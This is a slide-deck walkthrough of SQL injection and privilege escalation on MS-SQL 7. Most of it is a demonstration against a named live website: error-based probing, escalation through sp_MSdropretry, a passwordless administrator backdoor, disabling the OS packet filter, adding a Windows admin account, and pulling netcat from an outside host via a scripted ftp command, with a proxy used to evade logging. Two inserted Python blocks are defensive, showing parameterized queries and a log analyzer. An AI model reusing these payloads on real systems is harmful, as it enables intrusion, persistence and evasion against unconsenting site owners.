Penetrating an MS-SQL server via SQL-Injection and Cross-Database flaws
PART I: SQL HACKING TECHNIQUES
• sqlinjection
• convertmagic
• crossdatabase

DETECTING A SQL INJECTION FLAW
    http://www.company.com/product/price.asp?id=1
    select price from product where id=1

    http://www.company.com/product/price.asp?id=1'
    select price from product where id=1'
    Unclosed quotation mark before the character string '

    http://www.company.com/product/price.asp?id=[...]

THE CONVERT-MAGIC TECHNIQUE
    http://www.company.com/product/price.asp?id=1 and 1=convert(int,@@version) sp_password
    select price from product where id=1 and 1=convert(int,@@version)sp_password
    Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.
    'sp_password' was found in the text of this event. The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ' " ( )

THE CROSS-DATABASE FLAW IN MSSQL
    use testdatabase
    create proc dbo.test as select * from master.dbo.sysxlogins
    go
    exec test
    select * from master.dbo.sysxlogins
• sa == dbo
• a db_owner can create & design dbo's objects
• SID of proc dbo.test == SID of master.dbo.sysxlogins
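As an added illustration that is not part of the original deck: the price.asp lookup above written as two Python handlers against an in-memory sqlite3 table that stands in for SQL Server (an assumption made so the example runs offline; the table contents are constructed). The vulnerable handler concatenates the id into the statement, so the ' and convert(int,@@version) probes from the slides become database errors that reach the client, which is exactly the signal the detection and convert-magic steps rely on. The hardened handler validates the id as an integer and binds it as a parameter, so the same probes never reach the SQL parser.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the product table on the page.
    sqlite3 replaces SQL Server here only so the example runs offline; the
    concatenation bug is the same one a classic ASP + ADO page would have."""
    con = sqlite3.connect(":memory:")
    con.execute("create table product(id integer primary key, price real)")
    con.executemany("insert into product values (?, ?)",
                    [(1, 10.0), (2, 25.5), (3, 99.0)])
    return con


def price_vulnerable(con, id_param):
    """price.asp as the deck shows it: the raw query-string value is pasted
    into the statement text, so ?id=1' breaks the parser and
    ?id=1 and 1=convert(int,@@version) runs attacker-chosen SQL."""
    sql = "select price from product where id=" + id_param
    return [row[0] for row in con.execute(sql).fetchall()]


def price_hardened(con, id_param):
    """Same lookup, hardened in two independent layers."""
    # Layer 1: the id must be a plain decimal integer. Anything else is
    # answered by the caller with a generic 400, never with driver error text.
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        raise ValueError("invalid id")
    # Layer 2: bind the value as a parameter. The driver sends it separately
    # from the SQL text, so it can never be parsed as SQL.
    sql = "select price from product where id=?"
    return [row[0] for row in con.execute(sql, (int(id_param),)).fetchall()]


def probe(handler, con, id_param):
    """Run a handler and report what the client would observe: data, a
    database error (the oracle the convert-magic technique depends on),
    or a clean rejection with no database detail."""
    try:
        return ("ok", handler(con, id_param))
    except sqlite3.Error as exc:        # verbose driver error reaching the browser
        return ("db-error", str(exc))
    except ValueError:
        return ("rejected", None)


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 and 1=convert(int,@@version)"):
        print(repr(value),
              probe(price_vulnerable, db, value),
              probe(price_hardened, db, value))
```

The two layers are deliberately redundant: parameter binding alone already stops the injection, and the integer check alone already stops it for this parameter, but the check also keeps malformed input from ever producing a driver error, which removes the error-message oracle the rest of the deck builds on.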
THE INJECTION FLAW IN MASTER..SP_MSDROPRETRY
    CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname sysname)
    as
        declare @retcode int
        /*
        ** To public
        */
        exec ('drop table ' + @tname)
        if @@ERROR <> 0 return(1)
        exec ('drop procedure ' + @pname)
        if @@ERROR <> 0 return(1)
        return (0)

PRIVILEGE ESCALATION VIA MASTER..SP_MSDROPRETRY
    exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
    exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
    exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
    exec sp_executesql N'drop view dbo.test'
Resulting dynamic SQL:
    drop table xx update sysusers set sid=0x01 where name='dbo'
    drop procedure xx
    drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest
    drop table xx
• guest == db_owner of the master database

PART 2: SQL HACKING DEMONSTRATION
• Exploiting the SQL injection flaw at nhaxinh.com.vn
• Some lessons learned from hacking SQL

THE SQL INJECTION FLAW AT NHAXINH.COM.VN
• use "proxy.ia2.marketscore.com:80" to avoid being logged
    http://www.nhaxinh.com.vn/FullStory.asp?id=1
    http://www.nhaxinh.com.vn/FullStory.asp?id=1'
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
    /Including/general.asp, line 840

DETERMINING THE VERSION
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
    /Including/general.asp, line 840

DETERMINING SERVER_NAME
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
    /Including/general.asp, line 840

    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
    /Including/general.asp, line 840

    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
    /Including/general.asp, line 840
• user_name(): members of "sysadmin" are mapped to "dbo"

DETERMINING THE PRIVILEGE LEVEL OF SQL SERVER
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
    /Including/general.asp, line 840
• the admin has disabled openrowset/sqloledb; it will be re-enabled later

PUTTING GUEST INTO DB_OWNER OF THE MASTER DATABASE
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'
• Why? guest is db_owner of the master database, so guest can execute xp_regwrite or xp_cmdshell

CONFIRMING WHETHER GUEST IS NOW IN DB_OWNER OF THE MASTER DATABASE
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo')))
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int.
    /Including/general.asp, line 840

INSTALLING THE "BUILTIN\ADMINISTRATORS" BACKDOOR
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'
• log in to the database as "BUILTIN\ADMINISTRATORS" without needing a password

WHY NOT ADD THE "NHAXINH" USER DIRECTLY TO SYSADMIN?
    exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
• Error: Invalid object name 'XXXX' when querying the database later

ENABLING OPENROWSET/OLEDB & RE-CHECKING THE PRIVILEGE LEVEL OF SQL SERVER
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')
    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
    /Including/general.asp, line 840

DISABLING THE NT FIREWALL & TURNING OFF LOGGING IN SQL
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'--

ERROR WHEN ENABLING MASTER..XP_CMDSHELL & "ALLOW UPDATES"
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
    /Including/general.asp, line 840

ADDING A "SELECT 1" LINE TO FIX THE ERROR
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')
• set "allow updates"=1 allows the "system tables" (sysusers, syslogins, ...) to be updated directly, without going through the "system procedures"

NOTES WHEN RUNNING MASTER..XP_CMDSHELL
• exec master..xp_cmdshell 'dir c:\'   -> "SQLAgentCmdExec"
• select * from openrowset('sqloledb', 'server=;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "dir c:\"')   -> "NT AUTHORITY\SYSTEM"

DETERMINING THE SERVER'S IP
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))   (%25 == "%")
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
    /Including/general.asp, line 840

RECONNAISSANCE ON IP "203.162.7.70"
    C:\> ping 203.162.7.70
    Pinging 203.162.7.70 with 32 bytes of data:
    Reply from 203.162.7.70: bytes=32 time=232ms TTL=118

    C:\> ftp 203.162.7.70
    Connected to 203.162.7.70.
    220 unesco Microsoft FTP Service (Version 5.0).
    User (203.162.7.70:(none)):
• 203.162.7.70 == panvietnam.com

DIRECT FTP FAILED!
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')   (%26 == "&")
    C:\> ftp 203.162.7.70
    Connected to 203.162.7.70.
    220 unesco Microsoft FTP Service (Version 5.0).
    User (203.162.7.70:(none)): a
    331 Password required for a.
    Password:
    530 User a cannot log in.
    Login failed.
    ftp> bye

UPLOADING NETCAT TO THE SERVER
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')   (%3E == ">")
Decoded, the command string is:
    echo open a.b.c.d >f
    echo user a a >>f
    echo bin >>f
    echo cd a >>f
    echo mget * >>f
    echo quit >>f
    ftp -v -i -n -s:f
    del f

VERIFYING WHETHER NETCAT WAS UPLOADED SUCCESSFULLY
    http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))
    http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
    /Including/general.asp, line 840
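From the defender's side, as an added example that is not from the deck: a small Python analyzer over a constructed IIS W3C-style log excerpt whose cs-uri-query values mirror the request shapes of the walkthrough above (the host, client IPs, timestamps and field layout are invented). It URL-decodes each query, maps the request to the stage of the walkthrough its keywords belong to (fingerprinting through @@version and friends, escalation through sp_msdropretry and the system tables, OS-level reach through the xp_ procedures and openrowset), flags any non-integer value in a parameter the application only uses as an integer (the ' probe), and summarizes per source IP how far the sequence got and how many 500 responses it produced.

```python
import re
from urllib.parse import unquote_plus

# Constructed log excerpt. In IIS W3C logs the query string is logged
# URL-encoded, so it contains no spaces and whitespace splitting is safe.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-08-17 11:31:05 10.0.0.5 GET /FullStory.asp id=1 200
2003-08-17 11:31:09 10.0.0.5 GET /FullStory.asp id=1' 500
2003-08-17 11:31:20 10.0.0.5 GET /FullStory.asp id=1+and+1=convert(int,@@version) 500
2003-08-17 11:32:01 10.0.0.5 GET /FullStory.asp id=1;exec+sp_msdropretry+'xx+update+sysusers+set+sid=0x01+where+name=''dbo''','xx' 200
2003-08-17 11:33:40 10.0.0.5 GET /FullStory.asp id=1;exec+master..xp_regwrite+HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0-- 200
2003-08-17 11:34:12 10.0.0.5 GET /FullStory.asp id=1;insert+into+t+exec+master..xp_cmdshell+'ipconfig' 200
2003-08-17 11:35:00 10.0.0.9 GET /FullStory.asp id=7 200
"""

# Keywords grouped by the stage of the walkthrough they belong to, most
# severe first so a request is labelled with the worst thing it contains.
STAGES = [
    ("os-command", ["xp_cmdshell", "xp_regwrite", "xp_regdeletevalue",
                    "openrowset", "sp_addextendedproc"]),
    ("escalation", ["sp_msdropretry", "sysusers", "sysxlogins",
                    "sp_executesql", "allow updates"]),
    ("fingerprint", ["@@version", "@@servername", "db_name(",
                     "system_user", "convert(int"]),
]

INT_PARAMS = {"id"}   # parameters the application only ever uses as integers

ORDER = {"probe": 0, "fingerprint": 1, "escalation": 2, "os-command": 3}


def classify_query(raw_query):
    """Decode one cs-uri-query; return (stage, hits) or None if it looks benign."""
    decoded = unquote_plus(raw_query).lower()
    for stage, keywords in STAGES:
        found = [k for k in keywords if k in decoded]
        if found:
            return stage, found
    # No known keyword: still flag a non-integer value in an integer-only
    # parameter, which is what the single-quote probe looks like.
    for pair in decoded.split("&"):
        key, _, value = pair.partition("=")
        if key in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
            return "probe", [value]
    return None


def analyze(log_text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, time, c_ip, _method, _stem, query, status = line.split()
        result = classify_query(query)
        if result:
            stage, hits = result
            findings.append({"time": time, "ip": c_ip, "stage": stage,
                             "hits": hits, "status": int(status)})
    return findings


def summarize(findings):
    """Per source IP: most advanced stage reached, request count, 5xx count."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"stage": "probe",
                                             "requests": 0, "errors": 0})
        entry["requests"] += 1
        if ORDER[f["stage"]] > ORDER[entry["stage"]]:
            entry["stage"] = f["stage"]
        if f["status"] >= 500:
            entry["errors"] += 1
    return summary


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["stage"], f["hits"], f["status"])
    print(summarize(found))
```

The ordering of the stage table matters: a single request in the deck carries both sp_executesql and sysusers, or both openrowset and xp_cmdshell, so the most severe label wins. The 500 counter is the cheapest signal of all: an integer parameter that produces server errors is either broken or being probed, and both are worth a look before anything from the escalation stage shows up.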